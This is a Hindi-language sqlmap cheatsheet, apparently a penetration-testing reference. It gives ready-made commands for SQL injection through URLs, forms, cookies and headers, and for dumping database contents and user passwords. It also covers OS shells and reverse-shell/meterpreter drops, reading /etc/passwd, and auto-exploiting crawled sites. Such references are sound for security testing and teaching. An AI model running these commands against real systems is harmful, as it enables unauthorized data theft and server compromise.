SQLMap - Cheatsheet

Reading time: 11 minutes

SQLmap के लिए बुनियादी तर्क

सामान्य

-u "<URL>"
-p "<PARAM TO TEST>"
--user-agent=SQLMAP
--random-agent
--threads=10
--risk=3 #MAX
--level=5 #MAX
--dbms="<KNOWN DB TECH>"
--os="<OS>"
--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=http://127.0.0.1:8080
--union-char "GsFRts2" #Help sqlmap identify union SQLi techniques with a weird union char

तकनीक ध्वज (--technique)

--technique विकल्प आपको SQL इंजेक्शन तकनीकों को प्रतिबंधित या पुनर्व्यवस्थित करने की अनुमति देता है जिन्हें sqlmap परीक्षण करेगा। प्रत्येक अक्षर एक अलग प्रकार के पेलोड से संबंधित है:

डिफ़ॉल्ट क्रम जिसे sqlmap अनुसरण करेगा वह है BEUSTQ (सभी तकनीकें)। आप क्रम और उपसमुच्चय दोनों को बदल सकते हैं। उदाहरण के लिए, निम्नलिखित कमांड केवल UNION query और Time-based blind तकनीकों का प्रयास करेगा, पहले UNION का प्रयास करते हुए:

sqlmap -u "http://target.tld/page.php?id=1" --technique="UT" --batch

जानकारी प्राप्त करें

आंतरिक

--current-user #Get current user
--is-dba #Check if current user is Admin
--hostname #Get hostname
--users #Get usernames od DB
--passwords #Get passwords of users in DB
--privileges #Get privileges

DB डेटा

--all #Retrieve everything
--dump #Dump DBMS database table entries
--dbs #Names of the available databases
--tables #Tables of a database ( -D <DB NAME> )
--columns #Columns of a table  ( -D <DB NAME> -T <TABLE NAME> )
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column

SQLMapping का उपयोग करते हुए, यह एक व्यावहारिक उपकरण है जो कमांड उत्पन्न करता है और SQLMap के लिए एक संपूर्ण अवलोकन प्रदान करता है, दोनों बुनियादी और उन्नत। इसमें ToolTips शामिल हैं जो उपकरण के प्रत्येक पहलू को समझाते हैं, हर विकल्प का विवरण देते हैं ताकि आप इसे कुशलता और प्रभावी ढंग से उपयोग करना सीख सकें।

Injection place

From Burp/ZAP capture

अनुरोध को कैप्चर करें और एक req.txt फ़ाइल बनाएं।

sqlmap -r req.txt --current-user

GET अनुरोध इंजेक्शन

sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id

POST अनुरोध इंजेक्शन

sqlmap -u "http://example.com" --data "username=*&password=*"

हेडर और अन्य HTTP विधियों में इंजेक्शन

#Inside cookie
sqlmap  -u "http://example.com" --cookie "mycookies=*"

#Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"

#PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"

#The injection is located at the '*'

इंजेक्शन सफल होने पर स्ट्रिंग इंगित करें

--string="string_showed_when_TRUE"

पहचान तकनीक जोड़ें

यदि आपने एक SQLi पाया है लेकिन sqlmap ने इसे नहीं पहचाना, तो आप --prefix या --suffix जैसे तर्कों के साथ पहचान तकनीक को मजबूर कर सकते हैं, या यदि अधिक जटिल है, तो इसे sqlmap द्वारा उपयोग किए जाने वाले पेलोड में जोड़ सकते हैं जैसे कि /usr/share/sqlmap/data/xml/payloads/time_blind.xml में, उदाहरण के लिए समय अंधा आधारित।

मूल्यांकन

Sqlmap -e या --eval का उपयोग करने की अनुमति देता है ताकि प्रत्येक पेलोड को कुछ पायथन वनलाइनर के साथ भेजने से पहले संसाधित किया जा सके। यह कस्टम तरीकों से पेलोड को भेजने से पहले संसाधित करना बहुत आसान और तेज बनाता है। निम्नलिखित उदाहरण में flask कुकी सत्र को भेजने से पहले ज्ञात गुप्त के साथ flask द्वारा हस्ताक्षरित किया गया है:

sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump

शेल

#Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami

#Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell

#Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn

फ़ाइल पढ़ें

--file-read=/etc/passwd

SQLmap के साथ एक वेबसाइट को क्रॉल करें और ऑटो-एक्सप्लॉइट करें

sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3

--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms

दूसरे क्रम का इंजेक्शन

python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs

इस पोस्ट को पढ़ें यहां बताया गया है कि sqlmap के साथ सरल और जटिल दूसरे क्रम के इंजेक्शन कैसे करें।

इंजेक्शन को अनुकूलित करना

एक उपसर्ग सेट करें

python sqlmap.py -u "http://example.com/?id=1"  -p id --suffix="-- "

उपसर्ग

python sqlmap.py -u "http://example.com/?id=1"  -p id --prefix="') "

Boolean इंजेक्शन खोजने में मदद

# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch

Tamper

याद रखें कि आप अपने खुद के tamper को python में बना सकते हैं और यह बहुत सरल है। आप Second Order Injection page here में एक tamper उदाहरण पा सकते हैं।

--tamper=name_of_the_tamper
#In kali you can see all the tampers in /usr/share/sqlmap/tamper

References

• SQLMap: Testing SQL Database Vulnerabilities